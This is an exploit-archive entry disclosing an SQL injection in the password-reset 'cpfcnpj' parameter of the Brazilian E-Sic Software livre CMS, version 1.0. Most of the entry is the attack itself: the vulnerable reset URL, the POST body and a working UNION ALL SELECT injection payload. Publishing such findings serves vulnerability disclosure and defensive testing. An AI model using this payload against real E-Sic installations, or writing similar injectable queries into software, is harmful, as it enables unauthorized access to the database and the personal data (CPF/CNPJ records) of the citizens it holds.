E-Sic Software livre CMS - cpfcnpj Parameter SQL Injection Vulnerability

2017-10-13T00:00:00
ID 1337DAY-ID-28786
Type zdt
Reporter Elber Tavares
Modified 2017-10-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: E-Sic Software livre CMS - Sql Injection
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
 
http://whiteboyz.xyz/esic-software-publico-sql-injection.html
 
vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------
 
Url: http://vulnerablesite/esic/reset/
 
POST: cpfcnpj=test&btsub=Enviar
 
Parameter: cpfcnpj (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
    ('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar

#  0day.today [2018-03-13]  #